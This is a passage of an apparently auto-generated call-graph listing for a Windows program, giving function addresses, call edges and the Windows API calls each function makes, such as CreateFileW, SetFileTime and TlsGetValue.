14 API calls 6975->6976 6978 7f7ec2 6976->6978 6977->6973 6979 45e650 33 API calls 6977->6979 6982 7f7c41 6977->6982 6985 412220 18 API calls 6977->6985 6989 411d20 14 API calls 6977->6989 7003 7f4930 33 API calls 6977->7003 7005 7f48d0 33 API calls 6977->7005 7006 7f4830 46 API calls 6977->7006 6980 411d20 14 API calls 6978->6980 6979->6977 6981 7f7ed5 6980->6981 6981->6893 6983 413390 18 API calls 6982->6983 6984 7f7cea 6982->6984 6983->6984 8323 7f4930 6984->8323 6985->6977 6987 7f7d40 8327 7f48d0 6987->8327 6989->6977 6990 7f7d5c 6991 7f48d0 33 API calls 6990->6991 6992 7f7d78 6991->6992 6993 7f48d0 33 API calls 6992->6993 6994 7f7d94 6993->6994 6995 7f48d0 33 API calls 6994->6995 6996 7f7db0 6995->6996 6997 7f4930 33 API calls 6996->6997 6998 7f7dca 6997->6998 6999 7f4930 33 API calls 6998->6999 7000 7f7de4 6999->7000 7001 7f48d0 33 API calls 7000->7001 7002 7f7e00 7001->7002 7002->6973 8331 7f4830 7002->8331 7003->6977 7005->6977 7006->6977 7008 813421 7007->7008 7009 4116b0 TlsGetValue 7008->7009 7010 813451 7009->7010 7011 40fde0 TlsGetValue 7010->7011 7012 81348d 7011->7012 7013 40fec0 TlsGetValue 7012->7013 7014 80f970 7013->7014 7015 813c90 7014->7015 8337 40ff70 7015->8337 7018 420e80 7019 813cbf Sleep 7018->7019 7020 40fde0 TlsGetValue 7019->7020 7021 80f986 Sleep 7020->7021 7021->6907 7025 4117a0 7022->7025 7026 4117b2 7025->7026 7027 4100a0 TlsGetValue 7026->7027 7028 4117f1 7027->7028 7028->6878 7031 7fd292 7029->7031 7035 801c50 7031->7035 7032 7fd2b6 7038 7fd350 7032->7038 7034 7fd2c5 7034->6924 7042 4d3e50 7035->7042 7037 801c6d 7037->7032 7039 7fd376 7038->7039 7040 801c50 TlsGetValue 7039->7040 7041 7fd404 7039->7041 7040->7041 7041->7034 7043 4d3ea5 7042->7043 7044 4d3e5e 7042->7044 7045 4d3ead 7043->7045 7046 4d3eb3 7043->7046 7047 4d3ea3 7044->7047 7054 4d2750 7044->7054 7048 4d3ecb 7045->7048 7049 4d3eb1 7045->7049 7057 4d2fd0 7046->7057 7047->7037 7051 4093f0 TlsGetValue 7048->7051 7061 4d3040 7049->7061 7051->7047 7055 4090f0 TlsGetValue 7054->7055 7056 4d2766 7055->7056 7056->7047 7058 4d2fdb 7057->7058 7059 4d2fee 7058->7059 7060 4d2750 TlsGetValue 7058->7060 7059->7047 7060->7059 7063 4d304b 7061->7063 7062 4d305e 7062->7047 7063->7062 7064 4d2750 TlsGetValue 7063->7064 7064->7062 7073 511410 7065->7073 7067 511b1b 7077 511aa0 7067->7077 7069 511b2d 7069->6949 7071 511410 57 API calls 7070->7071 7072 5119cc 7071->7072 7072->6951 7074 511433 7073->7074 7081 5114c0 7074->7081 7076 511462 7076->7067 7078 511ab9 7077->7078 7079 511ae5 7078->7079 7129 50f310 7078->7129 7079->7069 7082 511515 7081->7082 7083 511618 7082->7083 7084 51154a 7082->7084 7125 436300 7083->7125 7104 436380 7084->7104 7087 51162b 7089 4374d0 2 API calls 7087->7089 7103 51160b 7087->7103 7088 410430 TlsGetValue 7091 5116c5 7088->7091 7092 51165a GetLastError 7089->7092 7090 51158c 7090->7103 7108 4374d0 7090->7108 7095 40fec0 TlsGetValue 7091->7095 7096 43ea00 3 API calls 7092->7096 7099 5116d5 7095->7099 7097 511679 7096->7097 7100 440c20 50 API calls 7097->7100 7099->7076 7100->7103 7101 5115de 7102 440c20 50 API calls 7101->7102 7102->7103 7103->7088 7105 4363e6 7104->7105 7106 436399 7104->7106 7105->7090 7107 43639e CreateFileW 7106->7107 7107->7105 7109 4374e9 7108->7109 7110 437520 7109->7110 7111 43750f 7109->7111 7113 43751e GetLastError 7110->7113 7114 4113d0 TlsGetValue 7110->7114 7112 4100a0 TlsGetValue 7111->7112 7112->7113 7119 43ea00 7113->7119 7115 43752e 7114->7115 7116 437536 GetFullPathNameW 7115->7116 7117 437556 7116->7117 7117->7113 7118 4113d0 TlsGetValue 7117->7118 7118->7113 7120 43ea32 FormatMessageW 7119->7120 7121 43ea2b 7119->7121 7122 43ea68 7120->7122 7121->7120 7123 4100a0 TlsGetValue 7122->7123 7124 43eaa1 LocalFree 7123->7124 7124->7101 7126 436316 7125->7126 7127 43636e 7125->7127 7126->7127 7128 436328 CreateFileW 7126->7128 7127->7087 7128->7127 7130 50f331 7129->7130 7134 50f351 7130->7134 7135 440a70 7130->7135 7131 50f39d 7131->7079 7133 440a70 33 API calls 7133->7134 7134->7131 7134->7133 7136 440a8e 7135->7136 7137 417be0 33 API calls 7136->7137 7138 440ab2 7137->7138 7138->7134 7140 7f78b0 50 API calls 7139->7140 7141 7f77c1 7140->7141 7142 440a70 33 API calls 7141->7142 7143 7f77dc 7141->7143 7142->7143 7144 7f7811 7143->7144 7145 440a70 33 API calls 7143->7145 7146 7f7753 7144->7146 7148 7f5cf0 7144->7148 7145->7144 7146->6963 7166 411b70 7148->7166 7153 7f603c 7193 411d20 7153->7193 7158 440a70 33 API calls 7161 7f5d61 7158->7161 7159 440a70 33 API calls 7159->7161 7160 7f4790 33 API calls 7160->7161 7161->7153 7161->7159 7161->7160 7162 7f47e0 33 API calls 7161->7162 7163 413390 18 API calls 7161->7163 7164 7f4700 46 API calls 7161->7164 7188 460bc0 7161->7188 7162->7161 7163->7161 7164->7161 7167 411bd0 7166->7167 7168 411b8a 7166->7168 7170 460d30 7167->7170 7168->7167 7199 411be0 7168->7199 7209 4645a0 7170->7209 7175 7f6d70 7176 7f6d9e 7175->7176 7386 413390 7176->7386 7178 413560 14 API calls 7179 7f5d48 7178->7179 7179->7158 7179->7161 7181 7f6de6 7182 7f6f62 7181->7182 7187 7f6fda 7181->7187 7389 7f4700 7181->7389 7183 7f6ffa 7182->7183 7185 7f6f8d 7182->7185 7184 413560 14 API calls 7183->7184 7184->7187 7186 413390 18 API calls 7185->7186 7186->7187 7187->7178 7395 462860 7188->7395 7190 460be3 7399 412ac0 7190->7399 7194 411ddf 7193->7194 7195 411d42 7193->7195 7194->7146 7195->7194 7196 411e20 14 API calls 7195->7196 7198 4093f0 TlsGetValue 7195->7198 7407 417420 7195->7407 7196->7195 7198->7195 7200 411bfb 7199->7200 7206 411c4b 7199->7206 7201 411c34 7200->7201 7202 411c12 7200->7202 7203 411cbc 7200->7203 7204 4093f0 TlsGetValue 7201->7204 7201->7206 7202->7201 7202->7206 7207 411c32 7202->7207 7205 411b70 TlsGetValue 7203->7205 7203->7206 7204->7206 7205->7203 7206->7168 7206->7206 7207->7206 7208 411be0 TlsGetValue 7207->7208 7208->7207 7210 4645b0 7209->7210 7211 4645c5 7209->7211 7212 440a70 33 API calls 7210->7212 7213 4645f4 7211->7213 7214 464360 18 API calls 7211->7214 7212->7211 7215 460d42 7213->7215 7220 461740 7213->7220 7214->7213 7217 464360 7215->7217 7259 412f60 7217->7259 7221 46176e 7220->7221 7222 440a70 33 API calls 7221->7222 7223 4617b3 7221->7223 7222->7223 7224 4090f0 TlsGetValue 7223->7224 7225 46181f 7223->7225 7232 4619a3 7223->7232 7224->7225 7226 4619a5 7225->7226 7227 46196c 7225->7227 7228 412ae0 14 API calls 7226->7228 7233 412ae0 7227->7233 7228->7232 7231 409120 TlsGetValue 7231->7232 7232->7215 7236 411e20 7233->7236 7235 412ae9 7235->7231 7237 411e40 7236->7237 7243 411eb4 7236->7243 7238 411e81 7237->7238 7239 411e4d 7237->7239 7238->7243 7244 411e9b 7238->7244 7253 411f60 7238->7253 7240 411e57 7239->7240 7255 411f21 7239->7255 7241 411e60 7240->7241 7242 411eaa 7240->7242 7241->7243 7247 411e72 7241->7247 7252 411ed7 7241->7252 7246 40fef0 TlsGetValue 7242->7246 7243->7235 7245 411f7a 7244->7245 7248 411ea8 7244->7248 7250 4093f0 TlsGetValue 7245->7250 7246->7243 7247->7245 7257 411e7f 7247->7257 7254 40fec0 TlsGetValue 7248->7254 7249 413560 14 API calls 7249->7253 7250->7243 7251 411d20 14 API calls 7251->7255 7252->7243 7256 411df0 TlsGetValue 7252->7256 7253->7243 7253->7249 7254->7243 7255->7243 7255->7251 7256->7252 7257->7243 7258 411e20 14 API calls 7257->7258 7258->7257 7260 412faf 7259->7260 7264 412fd5 7259->7264 7261 412fbd 7260->7261 7262 4093f0 TlsGetValue 7260->7262 7296 413560 7261->7296 7262->7261 7265 413057 7264->7265 7266 4093f0 TlsGetValue 7264->7266 7267 41306a 7265->7267 7268 4093f0 TlsGetValue 7265->7268 7266->7265 7269 41307f 7267->7269 7270 4131a9 7267->7270 7268->7267 7271 413092 7269->7271 7272 41318f 7269->7272 7274 4090f0 TlsGetValue 7270->7274 7302 412f00 7271->7302 7273 409150 TlsGetValue 7272->7273 7279 41314a 7273->7279 7276 4131b2 7274->7276 7284 41320f 7276->7284 7323 412750 7276->7323 7278 41314c 7280 413180 7278->7280 7283 412ae0 14 API calls 7278->7283 7281 412fd0 7279->7281 7289 412f60 18 API calls 7279->7289 7285 409150 TlsGetValue 7280->7285 7281->7153 7281->7175 7282 4130a3 7286 4090f0 TlsGetValue 7282->7286 7283->7280 7287 413560 14 API calls 7284->7287 7285->7279 7290 4130c8 7286->7290 7287->7279 7289->7279 7290->7279 7312 412920 7290->7312 7292 41310d 7293 413141 7292->7293 7294 412ae0 14 API calls 7292->7294 7295 409120 TlsGetValue 7293->7295 7294->7293 7295->7279 7297 4135d2 7296->7297 7299 413574 7296->7299 7297->7281 7298 4135c6 7300 409120 TlsGetValue 7298->7300 7299->7297 7299->7298 7301 411e20 14 API calls 7299->7301 7300->7297 7301->7298 7303 419650 TlsGetValue 7302->7303 7304 412f0e 7303->7304 7305 412f17 7304->7305 7306 412f26 7304->7306 7307 419650 TlsGetValue 7305->7307 7308 419650 TlsGetValue 7306->7308 7311 412f1c 7307->7311 7309 412f36 7308->7309 7310 419650 TlsGetValue 7309->7310 7310->7311 7311->7278 7311->7282 7313 412940 7312->7313 7318 412980 7312->7318 7314 412982 7313->7314 7315 41294d 7313->7315 7316 412957 7314->7316 7317 412a2e 7314->7317 7315->7316 7322 4129f8 7315->7322 7316->7318 7321 4093f0 TlsGetValue 7316->7321 7317->7318 7349 4124e0 7317->7349 7318->7292 7319 412920 18 API calls 7319->7322 7321->7318 7322->7318 7322->7319 7324 412770 7323->7324 7331 412801 7323->7331 7325 41277d 7324->7325 7326 4127bc 7324->7326 7327 412787 7325->7327 7335 41289f 7325->7335 7329 4128eb 7326->7329 7330 4127d6 7326->7330 7326->7331 7328 412790 7327->7328 7332 4127e5 7327->7332 7333 412806 7328->7333 7334 41279d 7328->7334 7329->7331 7379 4135e0 7329->7379 7336 4127e3 7330->7336 7337 41290c 7330->7337 7331->7284 7332->7331 7357 410540 7332->7357 7333->7331 7344 4104f0 2 API calls 7333->7344 7339 4127aa 7334->7339 7340 412848 7334->7340 7335->7331 7367 412220 7335->7367 7336->7331 7345 410430 TlsGetValue 7336->7345 7341 4093f0 TlsGetValue 7337->7341 7339->7337 7347 4127b7 7339->7347 7340->7331 7363 4121f0 7340->7363 7341->7331 7344->7333 7345->7336 7347->7331 7348 412750 18 API calls 7347->7348 7348->7347 7350 412715 7349->7350 7351 412516 7349->7351 7350->7317 7351->7350 7352 412920 18 API calls 7351->7352 7353 4124e0 18 API calls 7351->7353 7354 4093f0 TlsGetValue 7351->7354 7355 417460 18 API calls 7351->7355 7356 417420 14 API calls 7351->7356 7352->7351 7353->7351 7354->7351 7355->7351 7356->7351 7358 41055b 7357->7358 7362 410575 7357->7362 7360 40fd10 TlsGetValue 7358->7360 7358->7362 7359 40fe30 TlsGetValue 7361 4105b2 7359->7361 7360->7362 7361->7332 7362->7359 7364 412206 7363->7364 7365 4121fe 7363->7365 7366 4093f0 TlsGetValue 7364->7366 7365->7340 7366->7365 7368 41249d 7367->7368 7374 412256 7367->7374 7368->7335 7369 412220 18 API calls 7369->7374 7370 4135e0 18 API calls 7370->7374 7371 410540 TlsGetValue 7371->7374 7372 417460 18 API calls 7372->7374 7373 4093f0 TlsGetValue 7373->7374 7374->7368 7374->7369 7374->7370 7374->7371 7374->7372 7374->7373 7375 4104f0 SysFreeString TlsGetValue 7374->7375 7376 410430 TlsGetValue 7374->7376 7377 4121f0 TlsGetValue 7374->7377 7378 412750 18 API calls 7374->7378 7375->7374 7376->7374 7377->7374 7378->7374 7380 4135f5 7379->7380 7381 41360b 7379->7381 7380->7381 7382 4135fb 7380->7382 7385 413560 14 API calls 7381->7385 7383 4133d0 18 API calls 7382->7383 7384 413609 7383->7384 7384->7329 7385->7384 7387 412f60 18 API calls 7386->7387 7388 4133c1 7387->7388 7388->7181 7391 7f471d 7389->7391 7390 7f474b 7393 413560 14 API calls 7390->7393 7391->7390 7392 440a70 33 API calls 7391->7392 7392->7390 7394 7f4768 7393->7394 7394->7181 7396 462877 7395->7396 7397 46288d 7396->7397 7403 462810 7396->7403 7397->7190 7400 412ac9 7399->7400 7401 412ace 7399->7401 7402 412750 18 API calls 7400->7402 7401->7161 7402->7401 7405 46282e 7403->7405 7404 464360 18 API calls 7406 462856 7404->7406 7405->7404 7406->7397 7408 417453 7407->7408 7409 417432 7407->7409 7408->7195 7413 40cf00 7409->7413 7422 4159e0 7413->7422 7415 40cf2a 7426 40ced0 7415->7426 7418 4173c0 7419 4173e4 7418->7419 7420 4173c9 7418->7420 7419->7408 7430 416ef0 7420->7430 7423 415a03 7422->7423 7424 4159f9 7422->7424 7423->7424 7425 409390 TlsGetValue 7423->7425 7424->7415 7425->7424 7427 40cef5 7426->7427 7428 40cee1 7426->7428 7427->7418 7428->7427 7429 409390 TlsGetValue 7428->7429 7429->7427 7431 416fb3 7430->7431 7432 416f19 7430->7432 7431->7419 7438 4169e0 7432->7438 7434 416f57 7442 416a90 7434->7442 7439 4169f9 7438->7439 7440 4169ee 7438->7440 7439->7434 7441 40d960 12 API calls 7440->7441 7441->7439 7443 416aa6 7442->7443 7444 416a9e 7442->7444 7443->7431 7446 416600 7443->7446 7445 40db30 GetCurrentThreadId Sleep TlsGetValue 7444->7445 7445->7443 7447 416390 12 API calls 7446->7447 7449 416642 7447->7449 7448 4166c0 7450 4163b0 GetCurrentThreadId Sleep TlsGetValue 7448->7450 7449->7448 7451 41669f 7449->7451 7452 4166cb 7450->7452 7453 4166e0 GetCurrentThreadId Sleep TlsGetValue 7451->7453 7452->7431 7453->7452 7455 411b70 TlsGetValue 7454->7455 7456 7f80b3 7455->7456 7457 411b70 TlsGetValue 7456->7457 7458 7f80c6 7457->7458 7459 411b70 TlsGetValue 7458->7459 7460 7f80d9 7459->7460 7461 411b70 TlsGetValue 7460->7461 7462 7f80ec 7461->7462 7463 411b70 TlsGetValue 7462->7463 7464 7f80ff 7463->7464 7465 411b70 TlsGetValue 7464->7465 7466 7f8112 7465->7466 7467 411b70 TlsGetValue 7466->7467 7468 7f8125 7467->7468 7469 411d20 14 API calls 7468->7469 7470 7f8139 7469->7470 7600 7f9110 7470->7600 7473 412220 18 API calls 7474 7f8173 7473->7474 7475 40fde0 TlsGetValue 7474->7475 7476 7f8180 7475->7476 7643 7f7400 7476->7643 7479 7f823e 7674 442eb0 7479->7674 7481 411d20 14 API calls 7483 7f81c7 7481->7483 7653 45e650 7483->7653 7485 4104b0 TlsGetValue 7487 7f8278 7485->7487 7486 7f81dd 7488 412220 18 API calls 7486->7488 7489 7f82c1 7487->7489 7490 7f8281 7487->7490 7491 7f8210 7488->7491 7744 437410 7489->7744 7719 57a950 7490->7719 7657 7f5410 7491->7657 7498 57a950 33 API calls 7502 7f82fa 7498->7502 7499 4104b0 TlsGetValue 7500 7f82b2 7499->7500 7503 40fde0 TlsGetValue 7500->7503 7501 411d20 14 API calls 7501->7479 7504 4104b0 TlsGetValue 7502->7504 7505 7f82bf 7503->7505 7506 7f830d 7504->7506 7748 437260 7505->7748 7507 40fde0 TlsGetValue 7506->7507 7507->7505 7510 7f8359 7512 7f883d 7510->7512 7513 7f8396 7510->7513 7511 437260 TlsGetValue 7514 7f8350 7511->7514 7818 7f8a80 7512->7818 7515 511410 57 API calls 7513->7515 7752 579290 7514->7752 7518 7f83b0 7515->7518 7519 410430 TlsGetValue 7518->7519 7521 7f83cf 7519->7521 7520 40fec0 TlsGetValue 7522 7f885a 7520->7522 7523 7f8524 7521->7523 7524 7f83e2 7521->7524 7526 40fec0 TlsGetValue 7522->7526 7525 411d20 14 API calls 7523->7525 7527 411d20 14 API calls 7524->7527 7528 7f854a 7525->7528 7529 7f886c 7526->7529 7530 7f8408 7527->7530 7531 45e650 33 API calls 7528->7531 7532 411d20 14 API calls 7529->7532 7533 45e650 33 API calls 7530->7533 7534 7f8560 7531->7534 7535 7f887f 7532->7535 7536 7f841e 7533->7536 7538 412220 18 API calls 7534->7538 7539 411e20 14 API calls 7535->7539 7537 412220 18 API calls 7536->7537 7540 7f8451 7537->7540 7541 7f8593 7538->7541 7542 7f8899 7539->7542 7543 411d20 14 API calls 7540->7543 7544 510740 50 API calls 7541->7544 7545 411e20 14 API calls 7542->7545 7546 7f8475 7543->7546 7547 7f85ad 7544->7547 7548 7f88b3 7545->7548 7551 411d20 14 API calls 7546->7551 7555 7f851f 7546->7555 7549 411d20 14 API calls 7547->7549 7550 40fec0 TlsGetValue 7548->7550 7549->7555 7552 7f88c5 7550->7552 7553 7f84a8 7551->7553 7554 411d20 14 API calls 7552->7554 7556 45e650 33 API calls 7553->7556 7557 7f88d8 7554->7557 7558 40fde0 TlsGetValue 7555->7558 7559 7f84be 7556->7559 7557->6965 7560 7f862b 7558->7560 7561 412220 18 API calls 7559->7561 7772 436880 7560->7772 7563 7f84f1 7561->7563 7761 510740 7563->7761 7564 7f8639 7566 7f87ff 7564->7566 7781 7f4670 7564->7781 7569 411d20 14 API calls 7566->7569 7577 7f8817 7569->7577 7570 411d20 14 API calls 7570->7555 7572 7f86ba 7573 411d20 14 API calls 7572->7573 7575 7f86dd 7573->7575 7578 45e650 33 API calls 7575->7578 7577->7520 7580 7f86f0 7578->7580 7582 412220 18 API calls 7580->7582 7584 7f8720 7582->7584 7586 411d20 14 API calls 7584->7586 7588 7f8749 7586->7588 7587 579ce0 80 API calls 7587->7572 7588->7566 7589 411d20 14 API calls 7588->7589 7590 7f8776 7589->7590 7591 45e650 33 API calls 7590->7591 7592 7f8789 7591->7592 7593 412220 18 API calls 7592->7593 7594 7f87b9 7593->7594 7811 579f50 7594->7811 7599 411d20 14 API calls 7599->7566 7601 411b70 TlsGetValue 7600->7601 7602 7f9158 7601->7602 7603 411b70 TlsGetValue 7602->7603 7604 7f916b 7603->7604 7605 411b70 TlsGetValue 7604->7605 7606 7f917b 7605->7606 7607 7f91bb 7606->7607 7608 440a70 33 API calls 7606->7608 7609 7f91f7 7607->7609 7610 440a70 33 API calls 7607->7610 7608->7607 7611 413560 14 API calls 7609->7611 7610->7609 7612 7f9222 7611->7612 7613 411d20 14 API calls 7612->7613 7614 7f9288 7613->7614 7615 45e650 33 API calls 7614->7615 7616 7f929b 7615->7616 7617 412220 18 API calls 7616->7617 7618 7f92cb 7617->7618 7619 411d20 14 API calls 7618->7619 7620 7f9304 7619->7620 7621 440a70 33 API calls 7620->7621 7622 7f9343 7620->7622 7621->7622 7623 413390 18 API calls 7622->7623 7625 7f94cb 7623->7625 7624 7f9525 7627 411d20 14 API calls 7624->7627 7625->7624 7626 413390 18 API calls 7625->7626 7626->7624 7628 7f956c 7627->7628 7629 45e650 33 API calls 7628->7629 7630 7f957f 7629->7630 7631 412220 18 API calls 7630->7631 7632 7f95ac 7631->7632 7821 7fb0f0 7632->7821 7635 411d20 14 API calls 7636 7f9603 7635->7636 7637 7f9633 7636->7637 7638 40ced0 TlsGetValue 7636->7638 7639 411d20 14 API calls 7637->7639 7638->7637 7640 7f965d 7639->7640 7641 411e20 14 API calls 7640->7641 7642 7f8155 7641->7642 7642->7473 7646 7f7443 7643->7646 7652 7f74f9 7643->7652 7644 40fde0 TlsGetValue 7645 7f7519 7644->7645 7645->7479 7645->7481 7646->7652 7827 44b3d0 7646->7827 7648 7f74c7 7831 44b130 7648->7831 7650 7f74ec 7651 410430 TlsGetValue 7650->7651 7651->7652 7652->7644 7654 45e65d 7653->7654 7655 45e67b 7654->7655 7656 440a70 33 API calls 7654->7656 7655->7486 7656->7655 7658 7f543f 7657->7658 7659 7f545b 7658->7659 7660 7f544a 7658->7660 7661 44afb0 35 API calls 7659->7661 7869 44afb0 7660->7869 7663 7f5455 7661->7663 7664 44b130 50 API calls 7663->7664 7665 7f54a8 7664->7665 7666 410430 TlsGetValue 7665->7666 7667 7f54b5 7666->7667 7668 40fde0 TlsGetValue 7667->7668 7669 7f54bf 7668->7669 7670 40fde0 TlsGetValue 7669->7670 7671 7f54d3 7670->7671 7672 413560 14 API calls 7671->7672 7673 7f54e6 7672->7673 7673->7501 7675 442f1a 7674->7675 7676 442f42 7675->7676 7677 442f57 7675->7677 7678 410430 TlsGetValue 7676->7678 7679 443014 7677->7679 7680 442f68 7677->7680 7717 442f52 7678->7717 7682 4104b0 TlsGetValue 7679->7682 7873 434b10 7680->7873 7685 443024 7682->7685 7683 442f78 7878 434b60 7683->7878 7684 40fec0 TlsGetValue 7686 443761 7684->7686 7687 4104b0 TlsGetValue 7685->7687 7689 413560 14 API calls 7686->7689 7693 442fe9 7687->7693 7690 443774 7689->7690 7691 40fec0 TlsGetValue 7690->7691 7692 443786 7691->7692 7692->7485 7699 443059 7693->7699 7705 44313e 7693->7705 7694 442f99 7695 442fd6 7694->7695 7696 442feb 7694->7696 7698 4104b0 TlsGetValue 7695->7698 7697 434b10 TlsGetValue 7696->7697 7697->7693 7698->7693 7700 40fde0 TlsGetValue 7699->7700 7712 443062 7700->7712 7701 4431cb 7702 4431d4 7701->7702 7703 443741 7701->7703 7706 4431f5 7702->7706 7707 44332d 7702->7707 7704 410430 TlsGetValue 7703->7704 7704->7717 7705->7701 7710 413390 18 API calls 7705->7710 7708 4113d0 TlsGetValue 7706->7708 7709 4113d0 TlsGetValue 7707->7709 7708->7717 7709->7717 7710->7705 7713 4114b0 TlsGetValue 7712->7713 7714 4430be 7712->7714 7712->7717 7884 411190 7712->7884 7713->7712 7715 448740 TlsGetValue 7714->7715 7716 4430dd 7715->7716 7718 4114b0 TlsGetValue 7716->7718 7717->7684 7718->7717 7720 57a98c 7719->7720 7721 57a97a 7719->7721 7723 57a995 7720->7723 7729 57a9a7 7720->7729 7722 410430 TlsGetValue 7721->7722 7725 57a987 7722->7725 7726 410430 TlsGetValue 7723->7726 7724 57aa00 7890 57b7e0 7724->7890 7730 40fde0 TlsGetValue 7725->7730 7726->7725 7728 57aa11 7731 57aa22 7728->7731 7737 57aa31 7728->7737 7729->7724 7733 440a70 33 API calls 7729->7733 7735 57a9d4 7729->7735 7732 57aaa5 7730->7732 7734 410430 TlsGetValue 7731->7734 7732->7499 7733->7735 7734->7725 7735->7724 7736 440a70 33 API calls 7735->7736 7736->7724 7738 57aa57 7737->7738 7739 57aa8a 7737->7739 7741 411190 TlsGetValue 7738->7741 7740 411580 TlsGetValue 7739->7740 7740->7725 7742 57aa68 7741->7742 7743 4116b0 TlsGetValue 7742->7743 7743->7725 7745 43742e 7744->7745 7897 448700 7745->7897 7749 43727f 7748->7749 7750 448740 TlsGetValue 7749->7750 7751 4372cd 7750->7751 7751->7510 7751->7511 7901 57ae50 SetLastError 7752->7901 7759 40fde0 TlsGetValue 7760 5792ce 7759->7760 7760->7510 7762 51076f 7761->7762 7763 413390 18 API calls 7762->7763 7766 5107d3 7763->7766 7764 51082d 7765 413560 14 API calls 7764->7765 7767 51083e 7765->7767 7766->7764 8007 50f240 7766->8007 8010 510620 7766->8010 7768 413560 14 API calls 7767->7768 7770 51084f 7768->7770 7770->7570 7773 411140 7772->7773 7774 436899 GetFileAttributesW 7773->7774 7775 43692d GetLastError 7774->7775 7776 4368ad 7774->7776 7780 4368bc 7775->7780 7777 4368d2 CreateFileW 7776->7777 7776->7780 7778 436915 GetLastError 7777->7778 7779 436909 CloseHandle 7777->7779 7778->7780 7779->7780 7780->7564 7782 7f46ad 7781->7782 7784 7f46e5 7782->7784 8025 43c060 7782->8025 7784->7572 7785 579f60 7784->7785 8036 57a260 7785->8036 7788 579ce0 7789 579d34 7788->7789 7792 579d3f 7788->7792 7790 4090f0 TlsGetValue 7789->7790 7790->7792 7791 579dd2 SetLastError 8096 436cd0 7791->8096 7793 4090f0 TlsGetValue 7792->7793 7796 579d77 7792->7796 7793->7796 7794 4090f0 TlsGetValue 7797 579daf 7794->7797 7796->7791 7796->7794 7797->7791 7798 579de7 7799 579e11 CreateFileW 7798->7799 7800 579e8f CloseHandle SetLastError 7799->7800 7801 579e4c SetFileTime 7799->7801 7802 409120 TlsGetValue 7800->7802 7801->7800 7803 579ea9 7802->7803 7804 409120 TlsGetValue 7803->7804 7805 579eb2 7804->7805 7806 409120 TlsGetValue 7805->7806 7807 579ebb 7806->7807 7808 579f70 7807->7808 7809 57a260 47 API calls 7808->7809 7810 579f7b 7809->7810 7810->7587 7812 57a260 47 API calls 7811->7812 7813 579f5b 7812->7813 7814 57a040 7813->7814 7815 57a058 7814->7815 8303 436de0 7815->8303 7819 411d20 14 API calls 7818->7819 7820 7f8aa4 7819->7820 7820->7577 7822 7fb10b 7821->7822 7823 440a70 33 API calls 7822->7823 7825 7fb132 7822->7825 7823->7825 7824 412220 18 API calls 7826 7f95c1 7824->7826 7825->7824 7826->7635 7828 44b3de 7827->7828 7830 44b3ec 7827->7830 7847 44bb90 7828->7847 7830->7648 7832 44b155 7831->7832 7833 44b17c 7832->7833 7834 440a70 33 API calls 7832->7834 7835 440c20 50 API calls 7833->7835 7837 44b1b0 7833->7837 7834->7833 7835->7837 7836 44b1ef 7839 44b247 7836->7839 7840 440c20 50 API calls 7836->7840 7837->7836 7838 440c20 50 API calls 7837->7838 7838->7836 7859 44a6d0 7839->7859 7840->7839 7842 44b265 7843 44b28b 7842->7843 7845 440a70 33 API calls 7842->7845 7844 4113d0 TlsGetValue 7843->7844 7846 44b29e 7844->7846 7845->7843 7846->7650 7848 44bbaa 7847->7848 7851 44b5e0 7848->7851 7850 44bbde 7850->7830 7855 44b608 7851->7855 7852 44b624 GetACP 7854 44b63f GetCPInfo 7852->7854 7853 44b632 7853->7854 7856 44b66d 7854->7856 7857 44b682 7854->7857 7855->7852 7855->7853 7858 440a70 33 API calls 7856->7858 7857->7850 7858->7857 7860 44a6de 7859->7860 7867 44a6f8 7859->7867 7863 440a70 33 API calls 7860->7863 7860->7867 7861 44a72e 7864 440c20 50 API calls 7861->7864 7865 44a764 7861->7865 7862 440c20 50 API calls 7862->7861 7863->7867 7864->7865 7866 44a7b3 7865->7866 7868 440c20 50 API calls 7865->7868 7866->7842 7867->7861 7867->7862 7868->7866 7870 44afc0 7869->7870 7871 44afda 7869->7871 7870->7871 7872 44bb90 35 API calls 7870->7872 7871->7663 7872->7871 7874 410430 TlsGetValue 7873->7874 7875 434b21 7874->7875 7877 434b2f 7875->7877 7887 4106f0 7875->7887 7877->7683 7879 434b73 7878->7879 7880 4100a0 TlsGetValue 7879->7880 7881 434b8c 7880->7881 7882 434ba2 7881->7882 7883 434b98 CharLowerBuffW 7881->7883 7882->7694 7883->7882 7885 4100a0 TlsGetValue 7884->7885 7886 4111aa 7885->7886 7886->7712 7888 410610 TlsGetValue 7887->7888 7889 4106f9 7888->7889 7889->7877 7893 57b0d0 7890->7893 7892 57b7eb 7892->7728 7894 57b0e8 7893->7894 7896 57b10f 7893->7896 7895 440a70 33 API calls 7894->7895 7894->7896 7895->7896 7896->7892 7898 44871c 7897->7898 7899 4117a0 TlsGetValue 7898->7899 7900 437442 7899->7900 7900->7498 7902 4374d0 2 API calls 7901->7902 7903 57ae7d GetLastError 7902->7903 7904 57ae86 7903->7904 7905 57aeab 7903->7905 7904->7905 7907 43ea00 3 API calls 7904->7907 7906 40fde0 TlsGetValue 7905->7906 7908 5792b2 7906->7908 7909 57ae99 7907->7909 7911 579160 7908->7911 7940 440800 7909->7940 7944 579bc0 7911->7944 7913 579180 7919 5791bc 7913->7919 7963 57aef0 7913->7963 7915 40fde0 TlsGetValue 7916 5791ce 7915->7916 7920 436a90 7916->7920 7917 57919a 7918 440a70 33 API calls 7917->7918 7917->7919 7918->7919 7919->7915 7921 436abd 7920->7921 7922 436adf 7921->7922 7923 440a70 33 API calls 7921->7923 8002 442b60 7922->8002 7923->7922 7926 4104b0 TlsGetValue 7927 436b08 7926->7927 7928 436960 4 API calls 7927->7928 7929 436b13 7928->7929 7932 437200 TlsGetValue 7929->7932 7934 436b2a 7929->7934 7939 436b51 7929->7939 7930 40fec0 TlsGetValue 7931 436b9f 7930->7931 7933 40fde0 TlsGetValue 7931->7933 7932->7934 7935 436ba8 7933->7935 7936 437200 TlsGetValue 7934->7936 7934->7939 7935->7759 7937 436b6c 7936->7937 7938 436a90 37 API calls 7937->7938 7938->7939 7939->7930 7941 44081e 7940->7941 7942 410430 TlsGetValue 7941->7942 7943 440842 7942->7943 7943->7905 7978 57a3e0 7944->7978 7946 579be7 7982 57b460 7946->7982 7949 579c09 7989 434ce0 7949->7989 7950 440a70 33 API calls 7950->7949 7953 440a70 33 API calls 7954 579c3a 7953->7954 7955 579c66 7954->7955 7956 440a70 33 API calls 7954->7956 7957 579c9b 7955->7957 7999 579a10 7955->7999 7956->7955 7958 40fde0 TlsGetValue 7957->7958 7960 579cad 7958->7960 7960->7913 7962 440a70 33 API calls 7962->7957 7964 411190 TlsGetValue 7963->7964 7965 57af35 7964->7965 7966 411190 TlsGetValue 7965->7966 7967 